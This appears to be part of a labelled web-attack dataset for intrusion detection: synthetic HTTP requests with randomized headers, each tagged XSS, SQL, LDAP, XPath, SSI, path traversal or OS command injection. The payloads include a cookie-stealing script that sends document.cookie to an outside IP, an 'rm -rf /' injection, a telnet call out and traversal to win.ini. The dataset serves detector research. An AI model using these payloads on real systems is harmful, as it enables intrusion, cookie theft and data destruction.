aefhiokassIven=usr6n metac'owips tmocha&QtmpIandQJjidG=rspeixada7rnaet&UA0yem=7.s3_ft0&riTfuse9oEegr=noae

End - Id: 50086
Start - Id: 48277
class: XSS
POST /ioolnjdnuamiclpWSitt/rCr.jpg? HTTP/1.1
Content-Length: 59
Content-Language: epi
Content-Encoding: compress
Content-Location: /unOa.php3
Content-MD5: YWtlaXNoOG5vZWh0MHVMcg==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 28 Jan 07 16:17:26 CET
Last-Modified: Tue, 23 Mar 04 15:17:37 GMT
Host: 86.126.187.159
Connection: keep-alive
Accept: audio/basic, application/rtf
Accept-Charset: *
Accept-Encoding: *;q=0.9
Accept-Language: *;q=0.3
Cache-Control: only-if-cached
Client-ip: 238.157.214.210
Cookie: yj0i=dortml;hLgl8t=<<script    >[window.open('http://192.126.80.192/tore.cfm'+document.cookie);]</script  >;ot=l+9;pCto=et;tawksiplte=ake@xXIHD;oe=zHMpo
Cookie2: $Version="34"
Date: Sun, 11 Mar 07 14:10:36 UTC
ETag: "3nPp.-JJwnV9lEfO"
Expect: 100-continue
From: hoRi@FlkUTxtiad.cz
If-Modified-Since: Mon, 08 Mar 04 04:32:50 UTC
If-Unmodified-Since: Wed, 02 Jul 08 03:34:55 CET
If-Match: *
If-None-Match: "DFRpyEyG0b@XlMdTa"
If-Range: Wed, 13 Jan 10 12:55:33 GMT
Max-Forwards: 9
Pragma: no-cache
Proxy-Authorization: Basic c2lyY2V0aTpUdDRlNQ==
Authorization: Digest qop=auth
Range: 47-8,720672-48,49834-80
Referer: http://www.tEhhgthu.de/eaeM4/tttsiodh/egssd/ttecstEt.jpeg
Trailer: If-None-Match
User-Agent: Ywke (53AMy46z41; h1j0-t6KlA; c6@TI8K5K1; eWZPFM; e72@0OpYo4)
UA-CPU: MIPS
UA-Disp: 2403,5402,16
UA-OS: Win95
UA-Pixels: 715x493
Via: FTP/7.1 117.127.210.137:1169, ehjn7/9.2 www.soykySyS.tiff, 5.3 144.87.140.108
Transfer-Encoding: gzip
Upgrade: ems/9.3, nLe/5.9, 8btF/5.6, oSoftr/5.9, s3s/8.4
Warning: 212 118.3.73.205 "skqhhoz" 
~~~~~: ~~~~~~~~~~~~~~

snena7v=t&0rtteohfq=qoat yg7ekh&Y5Pstyle=tvd6 aice0 5bLbi o

End - Id: 48277
Start - Id: 36231
class: PathTransversal
GET /error/\..\..\..\..\winnt\win.ini? HTTP/1.0
Host: www.oEsixkamo.ch
Connection: keep-alive
Accept: */*;q=0.5
Accept-Charset: x-mac-ce, windows-874, windows-1253;q=0.2
Accept-Encoding: deflate;q=0.0, deflate
Accept-Language: *;q=0.7
Cache-Control: no-transform
Client-ip: 58.131.95.224
Cookie: x0dZLI1J=dknMuRVCjq
Cookie2: $Version="298"
Date: Fri, 06 Jun 08 04:17:59 GMT
ETag: "HNKW6sLk9FvzbJhDh2r"
Expect: 100-continue
From: tiieepnr@xgthjtra.biz
If-Modified-Since: Sun, 13 Sep 09 15:16:07 CET
If-Unmodified-Since: Tue, 30 Jun 09 19:49:34 CET
If-Match: "KF@Qh6Npq.Dbhdld7V"
If-None-Match: *
If-Range: "_k4xyieTdyAL8Fz8"
Max-Forwards: 717
MIME-Version: 9.7
Pragma: sDooBra=gs
Proxy-Authorization: Snrsty Ltrl=eythSgjt
Authorization: Basic YXVlQ3RnZTpFT3N0MWFl
Range: 183-
Referer: /7nu5aO/mRIvm/ikaxIec.ace
TE: trailers
Trailer: Accept-Language
User-Agent: Mozilla/0.1 (compatible; ibvem; Solaris; a670ieRrmo; toehvpOm)
UA-CPU: MIPS
UA-Disp: 399,5892,8
UA-OS: Solaris
Via: HTTP/8.1 www.hiQs.shtml
Transfer-Encoding: wco0ln; tmumx=othb
Upgrade: ahpnCe/3.0, aehm/4.9, kHt/9.5, de3Dh/9.6
X-Forwarded-For: 190.138.69.239
X-Serial-Number: 779670420209
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36231
Start - Id: 36784
class: OsCommanding
GET /eZY45z2bSFWRjI.SB/tsr/t2e/0m/exec8j0crcpoBlikez6/so/ePxnkhR/vmaotko/cY1q_PB2zHf/8Lna/d4aS/oPqthH1f5.asp?wtuFaaen=++%3B+++++echo%3B++++w+++%3B++++uname++-a+++%3B+id&kWipniic1o=2f4llgoApbTdled&AOrAgZHmexecin=s_HnyDost2 HTTP/1.0
Host: www.3oadi.biz
Connection: keep-alive
Accept: */*;q=0.0
Accept-Charset: windows-1250, windows-1252;q=0.8
Accept-Encoding: deflate, gzip;q=0.8
Accept-Language: *
Cache-Control: no-cache
Client-ip: 183.149.193.186
Cookie: pis4bedhoa=eezeonihhtaccesO;di=loegtu)Cre|n;noeOw=853;yecLrE=eqr
Cookie2: $Version="28"
Date: Mon, 09 Nov 09 17:25:37 GMT
ETag: W/"09GvkQ2HrUPf.JiKF"
Expect: tYl5irs
From: hqdnlp@uehby4G.ch
If-Modified-Since: Sun, 29 Jul 07 22:38:32 CET
If-Unmodified-Since: Thu, 19 Jul 07 09:10:19 UTC
If-Match: *
If-None-Match: "5tXW7h-y4n-EPYhqo."
If-Range: *
Max-Forwards: 588
MIME-Version: 5.1
Pragma: no-cache
Proxy-Authorization: NTLM NWl0Y25pb3Jha096ZWhmZXBzbmxoZW1LbTdlb25zaDJDdDVubnRib3RuaHNlZg==
Authorization: NTLM b1VobW1vdHRiYWVlbnJiaW5PbnVic3RlcWkxM2x0dHU0ZWRyZ3NqdA==
Range: 907-5,-807
Referer: http://www.ehctl7si.st/aasrhr/Aw1T8Un.txt
TE: trailers,gzip;q=0.4
Trailer: If-None-Match
User-Agent: 7uFuRIkJc1 http://www.detcra.st
UA-CPU: MIPS
UA-Disp: 9579,9287,8
UA-OS: Win95
UA-Color: color8
UA-Pixels: 232x1783
Via: FTP/9.8 212.141.128.165, 0.0 www.rtqny.html
Transfer-Encoding: gzip
Upgrade: lNc/6.5, 7nli6/7.0
Warning: 069 241.153.203.196 "ds96bdaie" "Mon, 05 May 08 12:27:37 UTC"
X-Forwarded-For: 5.176.183.129
X-Serial-Number: 51873709956197
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36784
Start - Id: 45620
class: PathTransversal
GET /baUigjNqW/mAe2aDEcsqMtSvQ2/1v9M4abRWcP07MIotIpF/41EjfQ@4/so/84FZdWpA/X9hIOoKmochaV5P/wOROsuqaEaeSwx/dcL.GoBjGa/t-w6RCBOIUC4hM/Amsnihoe4zerpa0Ioie/8sk.js?fpa=%7Etisrahstes&RDS11F=Oa2wn&nl=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fusr%2Fyo.bat&Oisr2ocean=76348443&hqtnrie=7mailius%28+h&g2hepetUSnagi=%3Clr&ea=71.Q69&qzgw=ytbhe&likejI4M6Q=+t0o&gcat=69553657&Ebbp5d=oMHui5clvchildi&9VhttpsPsiO=or%25%5B&naTetw8doNsbt4h=tLg-l2Wl&mdhlatehZoebmc=1254&iJ.IwlMOMZa=aiD8ANRb HTTP/1.0
Host: www.e7Xeeri.de:80
Connection: OesRroti
Accept: audio/x-wav
Accept-Charset: windows-1258, iso-8859-1;q=0.5, iso-10646-ucs-2
Accept-Encoding: gzip
Accept-Language: *;q=0.9
Cache-Control: only-if-cached
Client-ip: 54.187.183.145
Cookie: s9tSp0a6=s
Cookie2: $Version="41"
Date: Wed, 10 Nov 04 18:53:43 GMT
ETag: W/"hYq.Qe6vS5JVPkNg"
Expect: 100-continue
From: aieelt@lnoh1ttGc.st
If-Modified-Since: Thu, 08 Apr 10 03:22:33 CET
If-Unmodified-Since: Wed, 24 Jun 09 18:06:57 UTC
If-Match: *
If-None-Match: *
If-Range: Mon, 11 Sep 06 19:44:15 GMT
Max-Forwards: 45
MIME-Version: 4.5
Pragma: no-cache
Proxy-Authorization: Basic dG9pYjU6bG9Ib213Yw==
Authorization: NTLM eWJha3VubWVldmhodGhsZWRpMmVlbG5jajlVbnM4ZWFoVGFzNGUzNG9oOW9ydQ==
Range: 942-,71595-5
Referer: /ua2Gn9j.css
TE: deflate;q=0.2,deflate,trailers
Trailer: Transfer-Encoding
User-Agent: 8u2xsf/0.4.7.2
UA-CPU: Sparc
UA-Disp: 6050,986,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 0039x975
Via: FTP/3.1 www.epolm.html
Transfer-Encoding: eiSs
Upgrade: wdths/1.4, ocajr/8.7, hnt/8.6
Warning: 979 249.143.44.161 "mpeqyef6" 
X-Forwarded-For: 48.145.225.109
X-Serial-Number: 749320741
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 45620
Start - Id: 49055
class: XPathInjection
GET /6EutmpskHL15/5srIengi8ba5ebreoUs/O09qc/nyZD/lhxlqT/lae/hclsbs/Ao/rFDfX4..JhdBIy.png?SEmsna=efeea4oS&AKdRNwYW_=7d+%24o&atgn=7&AFQcats_N9d-body=net&autoexec0GTHARN7FMU=97173++++or+++count%28path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D%28%28i%2Bj%2Bk%2Bl%2B1%29%5D+%7C+path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1++++or+86573%3D HTTP/1.1
Host: www.ehlpTnsa.cz
Connection: at7Wt
Accept: */*;q=0.2
Accept-Charset: *
Accept-Encoding: gzip
Accept-Language: endorna-a;q=0.5, obionns-4psNtatj;q=0.9
Cache-Control: max-stale=89447
Client-ip: 20.81.251.104
Cookie: taso42=nN<|D ceed ;Cuc7vBszTn=sFNzw;tnu=6;ktmtshe=r6XikCxKvh;1aednajoEwtpc=nnulla+imgeBlrmsribtsN
Cookie2: $Version="41"
Date: Sat, 08 Apr 06 03:23:05 UTC
ETag: "Rts2dC5s1wzXOEQErdDA"
Expect: P7nlnno=i8ing;eEwjfHro
From: thhe@eis9.be
If-Modified-Since: Mon, 22 Mar 04 20:16:08 GMT
If-Unmodified-Since: Fri, 01 Aug 08 19:14:08 CET
If-Match: "xlFSVSD2iyZ6l003HxqZ"
If-None-Match: *
If-Range: *
Max-Forwards: 2509
MIME-Version: 6.2
Pragma: no-cache
Proxy-Authorization: Basic cjhhZTp0b2h1bkll
Authorization: Basic Nmd2aDpOZm54aW4=
Range: 15125-,9750-
Referer: /mjlTio.css
TE: trailers,trailers
Trailer: Referer
User-Agent: tihpse5ib/8.3
UA-CPU: x86
UA-Disp: 357,241,16
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 003x367
Via: HTTP/5.8 www.srpoanr.css, FTP/9.7 174.224.157.210:69912, 5.6 www.ash3ta.html
Transfer-Encoding: s4nese
Upgrade: BzRA/3.7, eSa/6.4, DCeds/5.7
Warning: 712 141.86.56.222 "RenNkwhed" "Fri, 05 Oct 07 19:54:02 GMT"
X-Forwarded-For: 161.22.54.66
X-Serial-Number: 00114
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49055
Start - Id: 39240
class: SSI
GET /dwdtnwmsaehciimdrHe/yN04c@M/7wgb86TjqItidP2@O1A/atjmEnUPXhhv2LJK/lBSFh@r5pWzVxo.png?nu4desEta=u8Iyq%3D2tprot&0dazeeb=%3C%21--%23echo+var%3D%22date_gmt%22--%3E&Zi1tuscoshebde=lI%405T HTTP/1.0
Host: 4.215.82.236
Connection: keep-alive
Accept: video/*;q=0.0
Accept-Charset: *;q=0.0
Accept-Encoding: 
Accept-Language: pok3-8xtqahg;q=0.8
Cache-Control: no-store
Client-ip: 240.199.60.134
Cookie: I1Bg@=amsGzNwqeE;9ini=rdroptlh=@
Cookie2: $Version="2"
Date: Sat, 15 Nov 08 07:10:42 CET
ETag: W/"jRsIL1CqmGtIEhLf-xD7"
Expect: 100-continue
From: saxeqIt@wdataw7.be
If-Modified-Since: Sun, 06 Sep 09 23:29:26 CET
If-Unmodified-Since: Mon, 12 Jun 06 09:09:42 CET
If-Match: "Ax_Hwmw7aTiwjzh"
If-None-Match: "N.cmXCUp8aUw.1p8dC"
If-Range: "QEelm2mgLh-UbRfP0"
Max-Forwards: 86
MIME-Version: 4.9
Pragma: l4ocdme=ftotto3
Proxy-Authorization: Basic c2ltMjpzYWdlYjVhYQ==
Authorization: Digest realm
Range: 5-9725,-6683
Referer: http://1n8sEaj.it/owqy.cfm
TE: trailers,trailers
Trailer: Date
User-Agent: 0inn24sia/9.7.5.8
UA-CPU: 68000
UA-Disp: 274,6270,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 833x510
Via: 7.3 www.juAstie.shtml, HTTP/7.6 www.ednc.gif
Transfer-Encoding: deflate
Upgrade: sjrtoN/2.4, ytwq/5.4, RmLke/9.3, citRri/1.2
Warning: 181 99.114.125.39:5648 "7neetnanYrOl" "Tue, 11 Jul 06 10:45:12 GMT"
X-Forwarded-For: 252.9.253.184
X-Serial-Number: 2940498240401251
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39240
Start - Id: 49863
class: XPathInjection
GET /rd2E1getbte7/Rsmitl/dn4/brWtlHrnbRX3Yr.aspx?nEIOpod5ae=ewt28ioGdr&9se=tLscgy5icor&yrbaktaOfTmtqig=57403555&lICalmhi=yptiz%27%5D+++++%7C+++P++%7C+%2F%2Fuser%5B+++++name%2Ftext%28++++%29+++%3D+++%27dbne&0r=ytslocationhi0&aa3W2=baoidQ6b3uiowapy HTTP/1.0
Host: 147.114.133.225
Connection: close
Accept: */*;q=0.5
Accept-Charset: *;q=0.1
Accept-Encoding: 
Accept-Language: *;q=0.3
Cache-Control: max-age=8
Client-ip: 80.94.229.196
Cookie: a9Rei=shul;diyynwtn1tegoa=i&%
Cookie2: $Version="5"
Date: Tue, 17 Feb 09 22:27:16 CET
ETag: "xcInQ_66Zglzx9B"
Expect: ioqeane
From: eslc7@67owp.net
If-Modified-Since: Sun, 16 Sep 07 02:49:10 CET
If-Unmodified-Since: Mon, 16 Aug 04 09:15:08 UTC
If-Match: *
If-None-Match: *
If-Range: "3oI85smExYicW8c7yHH_"
Max-Forwards: 6
MIME-Version: 4.0
Pragma: no-cache
Proxy-Authorization: Digest qop=auth-int
Authorization: NTLM ZWVqV3N1OWVUYXJxc3puaXFzUmJlaWExZHRldG5maXR4ZTF0ZQ==
Range: 40331-8,658595-,136-
Referer: /edia/eenises/iwjve/bnsqe5ba/1yti5ah.dll
TE: trailers,trailers,deflate
Trailer: From
User-Agent: Mozilla/1.4 (Machintosh; U; PPC 3.9; ee-rK; rv:0.4.8) Gecko/80157847
UA-CPU: MIPS
UA-Disp: 2831,824,32
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 8115x7637
Via: 8.5 www.qhwyUdl.js, 0.5 www.ShNMn.tiff:41
Transfer-Encoding: gzip
Upgrade: eht/0.8, T3l/7.9, myt2/5.8
Warning: 988 26.40.140.189 "waoenT" 
X-Forwarded-For: 246.212.130.181
X-Serial-Number: 5095784293385
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 49863
Start - Id: 37821
class: LdapInjection
GET /iP7yj/rECUReaeAwJ/isEetdFiLll1rt/phq5QGX/h5wriennnDic4nic/ndymxtbFtxtea3e/a_FnQWdNq_LFoYMJ/7M9n/hnsfim4tm.cgi?oeicsEateereasn=styleewnetcatnt%40hhooie&nemttct=ixgnjCqL&t26bieTsoeqtM2=%22%29%28targetfilter%3D%28o%3DNetscapeRoot%29%29&iu8=wrtoyvhhR3r&oeayn1q=7e8ue3yEperlm&Lwuaaftkieyf=iD6ninserth53clant&toe4oenue5ljf2e=0980&yifrrin=2&ynMveoygoitt=984076&Tphiin=gtD%3E&union4LW2vlshQ=fx.m8k&0tes=daen HTTP/1.0
Host: 40.247.8.54
Connection: close
Accept: video/mpeg;q=0.6
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-transform
Client-ip: 68.129.230.145
Cookie: uogtr5dh1c=0Bwghmo4I;an3=r;pfrn=523;ae29T13B5nslu=rIoe
Cookie2: $Version="1"
Date: Tue, 25 Dec 07 23:26:00 GMT
ETag: "Ob3LephYBYDp-6jiyC"
Expect: 100-continue
From: oltCtuc@anfmtcot1m.gov
If-Modified-Since: Wed, 27 May 09 06:51:16 CET
If-Unmodified-Since: Sat, 23 Jun 07 20:03:24 GMT
If-Match: *
If-None-Match: "D2vEUuyv2WU99ksb"
If-Range: "hT0..GSfvGJaO_91M0"
Max-Forwards: 8
MIME-Version: 0.8
Pragma: McTS='3iM'
Proxy-Authorization: Digest uri=/newerY/iesL.bin
Authorization: Basic N2FkYmlyczp5bHFyb2VJ
Range: 094778-515740,335144-
Referer: http://tuht.com/rE2mmn4h.tar.gz
TE: deflate;q=0.2,chunked
Trailer: TE
User-Agent: tcletear/2.3.3
UA-CPU: x86
UA-Disp: 0815,794,16
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 2010x029
Via: FTP/6.4 www.oc0eap.gif, nodupn/2.5 www.gatioer.shtml
Transfer-Encoding: deflate
Upgrade: ziaeo/3.7, fyav/7.8, dpa0ed/1.0, mfirt/0.2, pSli/6.6
Warning: 166 78.105.41.24 "sewleo7lheo" "Tue, 16 Jun 09 20:36:56 UTC"
X-Forwarded-For: 178.127.38.107
X-Serial-Number: 9737658238850824210
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37821
Start - Id: 36585
class: OsCommanding
GET /bin/alibaba.pl|dir ..\\..\\..\\..\\..\\..\\..\\,? HTTP/1.1
Host: 231.218.222.216:80
Connection: iRae5e
Accept: application/*;q=0.3, video/quicktime;q=0.4
Accept-Charset: isiri-3342;q=0.5, x-mac-korean;q=0.3, x-mac-ce;q=0.4, macintosh, windows-1252
Accept-Encoding: *;q=0.8
Accept-Language: EDw-mhaidpii, 11mc-eleid;q=0.4, nU-Em8tnLs
Cache-Control: szv=gnqsnai
Client-ip: 252.39.154.149
Cookie: tfcbiaeolEm=aIoar~n;lpo0QOKe9tsF=2;kx6s=oirofsdtotow;6e=csv
Cookie2: $Version="05"
Date: Mon, 15 Dec 08 22:58:46 GMT
ETag: W/"ii87XQjje42GUbBHrDr"
Expect: 100-continue
From: osNAoh@aHn2nry.de
If-Modified-Since: Thu, 26 Mar 09 02:12:14 UTC
If-Unmodified-Since: Fri, 16 Nov 07 12:48:50 CET
If-Match: "sjzbDPggXqFv7mTRp"
If-None-Match: "U8jhXuzH.@IoHUz9Vl"
If-Range: "YkdFyFmR4vc.Sz8ebw"
Max-Forwards: 150
MIME-Version: 1.8
Pragma: nzitwee=e
Proxy-Authorization: Digest nonce
Authorization: NTLM QWlyQnJpcGRlYWlSYWFla254emFpZzFkaGRjcXN0ZG9odXRsZXlocm5BZQ==
Range: -5
Referer: /aSes/alxisae/rtr7i/saiu0apo.wav
TE: trailers,trailers,trailers
Trailer: If-Modified-Since
User-Agent: oaee/8.4
UA-CPU: PowerPC
UA-Disp: 380,5893,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 477x077
Via: HTTP/3.4 63.108.104.73
Transfer-Encoding: 1iuif
Upgrade: ldezE/3.1, ieuhio/3.5, vasgc/3.8, trl4e/6.5
Warning: 353 98.201.134.39 "fe2bemhte" 
X-Forwarded-For: 50.37.241.255
X-Serial-Number: 8032084316017934872
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36585
Start - Id: 37505
class: LdapInjection
GET /LNiniframeK/lg/csunelq9i/gyp/b4BZP20r.GSpsOy_P/Wsa3location3libUIPV@/nCH5-5PA7.swf?dhsera=00741&Eks=4a3tnbe7&rbl=56335762&yehnob3ot=suQng9sueny%24&egwmA1xtlalno=re75h%3Bbektnycaccess_loghecor&niiidgh=Uo%28a%24apjmHhw2nr&9odm=s5v&hn=us%40el8wroedm%3Cnpri&aiePfxcasrCreet=%40%5D%3Cnesld6le+1QAi&enuexotd=deaaxkasgedyn&dcenai=sxEWea4i1no1qee4&rt7uibcinliofhu=rl&05=mBRG8it03l HTTP/1.1
Host: www.u7ce.fr
Connection: udnif
Accept: */*
Accept-Charset: *;q=0.6
Accept-Language: *
Cache-Control: thuynllm='4oyeNdC'
Cookie: e0T=etswbede;lmec280EDegelfw=d3)(&(objectClass   =7id*);8f=74924681;om8=6918459;r04=7025141;nnPocn5hbl=964
If-Range: *
Pragma: no-cache
Authorization: serrf cgsag=6t3oz
Referer: /ii9drhz/isqw/Rri9/u4mt/betzl4ee.dll
User-Agent: Mozilla/3.1 (Machintosh; U; PPC Mac OS X 3.6; id-jy; rv:7.2.1) Gecko/50577243
UA-Color: color16

null

End - Id: 37505
Start - Id: 43008
class: OsCommanding
PUT /rnl1aut8/tJuoh/aAC9B-H/cdDol5eaY3iSr3ypcerf/ya1/eteorwFQo/y.diTQ.FaMntck/wLjR.php? HTTP/1.1
Content-Length: 71
Content-Language: o8,ugAe
Content-Encoding: compress
Content-Location: http://www.fkHtcrs.cz/eiiose6/otisr01e.msf
Content-MD5: U2VuYTZuaWVwbHJvbmJubg==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 25 Jun 06 17:13:25 GMT
Last-Modified: Thu, 13 May 04 03:42:12 UTC
Host: www.bdeOtde.st
Connection: close
Accept: */*
Accept-Charset: iso-2022-kr
Accept-Encoding: gzip, compress;q=0.4, identity
Accept-Language: q6s-1amz, 3-p
Cache-Control: only-if-cached
Client-ip: 110.134.30.79
Cookie: I2P.aT3=0135233;me=ltlRiv
Cookie2: $Version="63"
Date: Mon, 25 May 09 14:34:58 UTC
ETag: "Aqf5044MbtPJs63SjmiZ"
Expect: 100-continue
From: odyrata@nanebCh8fa.gov
If-Modified-Since: Wed, 24 Mar 04 20:21:06 UTC
If-Unmodified-Since: Mon, 29 Aug 05 21:03:53 GMT
If-Match: "DSYKsWIJWGQ_HO.pIr6E"
If-None-Match: *
If-Range: *
Max-Forwards: 94
Pragma: I=e9
Authorization: Digest realm
Referer: http://www.bniSla.st/rten5ith.doc
TE: trailers
Trailer: Proxy-Authorization
User-Agent: Mozilla/8.8 (X11; U; Solaris 9.7; U2-y9; rv:7.0.2) Gecko/17281861
UA-Pixels: 2695x320
Via: 1.5 44.118.46.6
Transfer-Encoding: 1dynle; ehrnen=xcniebg
Upgrade: e5edij/1.7, tveoee/4.3
Warning: 863 www.t8fst5.js:4942 "iaa8uceowT1aeejsueoy" "Mon, 03 Nov 08 04:48:51 UTC"
X-Forwarded-For: 225.212.15.105
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~

ygsfsm3s=20284&etis=61&ap5oouni=`     rm -rf /     `&dha=37416382

End - Id: 43008
Start - Id: 46620
class: XSS
GET /kando1b3ox5Bh7/oeoaia/ZNnc/i3elenCDGjTqgmg8/iNA./t2u/wn.cgi?a2SiEoasKrs=hh3ptlydbtllndos1a&eIicrteec=t&usjeuuSme7s=089119957&jn5t=srsrotito7wmsl&kRIzY4BrmRx=processing-instructiondf6ona+&osaep0jVn=643781&Wa0h=up%24lcopen%3Fntsystemht%3F&k0v4oHsso=%3DbttvL&lIssc4s=492975603&iEcvednntteh1ef=990537 HTTP/1.1
Host: 18.52.70.59
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.2
Accept-Encoding: 
Accept-Language: <link     rel   =  "stylesheet  "   href  =  "    javascript:   [alert('ddtow');] "  >
Cache-Control: no-store
Client-ip: 152.27.71.121
Cookie: g6aocn=3304725;atitasbejitvh=efuleze9hpben;eyncb=pinsa;n76iEpt1eea1r=4415528938
Cookie2: $Version="61"
Date: Wed, 08 Nov 06 06:55:39 GMT
ETag: W/"Sh4v0LOFPRUKRUrK"
Expect: 100-continue
From: hvhi4ts@qyetTdit8.net
If-Modified-Since: Mon, 02 May 05 09:00:16 CET
If-Unmodified-Since: Wed, 24 Sep 08 24:04:47 UTC
If-Match: "E1g3EB@jpF33Xko_2PjU"
If-None-Match: "lc4CEALXcjjxnBNr"
If-Range: "q50eA3iD0coTiyac_1fL"
Max-Forwards: 75
MIME-Version: 5.6
Pragma: ooMli=A72
Proxy-Authorization: Digest username="anztewo"
Authorization: NTLM aUh0ZW5IZW5laUhBaW5keXBvc2Fxb2V2c2lhcnBFYzVhWWJWbnNjdmdpeWFydHo=
Range: 7283-8
Referer: http://soneatp.net/4hnnm.msf
TE: chunked
Trailer: If-None-Match
User-Agent: aPcnoawAd8 (zszJyjYY1; wtQCWAAd@; s9Xisa)
UA-CPU: 68000
UA-Disp: 487,2681,32
UA-OS: Win95
UA-Color: color8
UA-Pixels: 950x529
Via: FTP/5.9 74.134.254.141, 7.7 172.180.171.6, 8.1 www.ld2b.js
Transfer-Encoding: gzip
Upgrade: edw/7.9, a9aldo/9.4, p2zc/2.5, sti/1.5
Warning: 749 169.197.175.54 "aTaul8Deeyii" "Wed, 21 Apr 04 19:11:25 GMT"
X-Forwarded-For: 151.204.29.132
X-Serial-Number: 1432096438737342
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 46620
Start - Id: 35182
class: SqlInjection
GET /aveTet/9e/kythttpUsamfoYL3nYyp/Krl@kV3go.jpg?nnwkeeYi59ajll=OR+++%27mOion5vos%27+++IN++++%28+%27+%27++%29&CfGFJ7k=di8ifdre3Tkrbl&urSodlhqiE=pIfm4TF&m4tTeadzual=osc3seret&Uesuoserliethr=si%25e7%3Cl HTTP/1.0
Host: 253.174.183.197
Connection: Gmimhe
Accept: audio/*;q=0.4, audio/*
Accept-Charset: *;q=0.3
Accept-Encoding: deflate;q=0.2
Accept-Language: *;q=0.2
Cache-Control: eea=e8mkAx1f
Client-ip: 116.56.251.175
Cookie: ssdptwo=rr7fruJeh;mmdneJoecc=9869692
Cookie2: $Version="711"
Date: Sun, 26 Sep 04 14:26:49 CET
ETag: "03P6MG1v10dHj@5U"
Expect: twhn
From: as5oeh@nl7ehee.ch
If-Modified-Since: Tue, 23 May 06 16:55:25 CET
If-Unmodified-Since: Tue, 01 Jul 08 06:57:34 GMT
If-Match: *
If-None-Match: "UkwHvXsSWbTZVHc834"
If-Range: *
Max-Forwards: 052
MIME-Version: 2.3
Pragma: AdmndsSs='5oUov'
Proxy-Authorization: ortr bdoanD=ot23oe
Authorization: ea2oq rvfukh0=4ucd
Range: -76801,392-,94069-
Referer: /aupMonjs.aspx
TE: trailers
Trailer: From
User-Agent: 5enn0 (euj.b@inwb)
UA-CPU: StrongARM
UA-Disp: 1981,291,8
Via: 6.7 www.eaab.htm, 1.1 115.68.202.133, 4.6 www.oroetH.gif
Transfer-Encoding: identity
Warning: 913 12.114.230.71:1507 "rGsmdofPbfah2t8sgGp" "Tue, 13 Jul 04 12:14:20 GMT"
X-Forwarded-For: 74.88.12.154
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35182
Start - Id: 36701
class: OsCommanding
POST /gEMHH00odmZ/jweo8rr8/gOtqrenfaioeuda/Drna6eonotAoesd/nc8aeeaioUr/sasEietpeEodabaytaa/eq6V_ie.lJdNW1-/w8LDf.dll? HTTP/1.0
Content-Length: 247
Content-Language: wa,eRT
Content-Encoding: gzip
Content-Location: http://www.wtapYeN.org/watCl57/uneft/isct/ipenhnNs/lGnodnT.jsp
Content-MD5: dmV5NnRuaWV3aEhhak5uag==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 10 Apr 09 06:36:30 UTC
Last-Modified: Fri, 20 Aug 04 20:11:34 UTC
Host: 112.133.68.8
Connection: keep-alive
Accept: */*;q=0.8
Accept-Charset: *;q=0.9
Accept-Encoding: compress, deflate;q=0.8
Accept-Language: enqbi67m-d2ezq, pbijatat-aruiA
Cache-Control: only-if-cached
Client-ip: 24.6.250.56
Cookie: its=2eiyaasF7oe;ncuO4ahqzLUz_=13395375;yYyic7enw=cSBIGAS.9_;yrekIaxae=mV3m9-
Cookie2: $Version="134"
Date: Thu, 22 Oct 09 20:17:07 GMT
ETag: W/"LE7CRa2rOJ_8Ht@xs8X"
Expect: 7oiToetn
From: debomi@hLAy.be
If-Modified-Since: Thu, 17 Apr 08 07:54:57 UTC
If-Unmodified-Since: Sun, 30 May 04 02:57:21 UTC
If-Match: "36xnzueWE8q@hfH.yFXT"
If-Range: Sat, 29 Oct 05 15:26:46 UTC
Max-Forwards: 649
MIME-Version: 5.1
Pragma: hnon5s=d4o
Proxy-Authorization: ssrr uentet=otetm
Authorization: Digest nonce
Range: 426198-
Referer: http://ysrewdie.fr/aeod/h8oea/tjec/3mit5fh.png
TE: trailers,trailers,trailers
Trailer: Pragma
User-Agent: usesrrk6heke4eeelmNl
UA-CPU: StrongARM
UA-Disp: 1584,454,32
UA-Color: color32
UA-Pixels: 654x545
Via: 6.2 www.sp2ynr.js, 5.2 www.iieees.html
Transfer-Encoding: deflate
Upgrade: rqbee/8.8
X-Forwarded-For: 123.125.191.125
X-Serial-Number: 56753790065108318
----: -------------------------

uteopv=22&la=noat&kperlL8q3wstdin="    ;  telnet   190.82.238.183     80    ;&HcdbngsfnnEh=mL1g0yVky&haa=4&ltaitXhgn5=ih]lphp74&var h/dwd&thtIalotne=519192749&bueg3saa4et2reh=0n0nr4bgsoundl&t5onawitRtcHm=n3DrHO&7y0Itdkrt=1152&onh=%fn

End - Id: 36701
Start - Id: 39432
class: SSI
